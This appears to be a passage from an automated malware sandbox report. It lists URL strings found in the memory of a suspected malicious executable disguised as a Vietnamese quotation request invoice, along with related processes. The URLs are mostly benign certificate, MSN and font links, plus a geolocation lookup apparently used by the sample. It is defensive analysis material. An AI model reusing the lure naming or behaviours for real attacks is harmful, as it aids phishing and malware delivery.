Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://geoplugin.net/json.gp
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: bhvF833.tmp.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
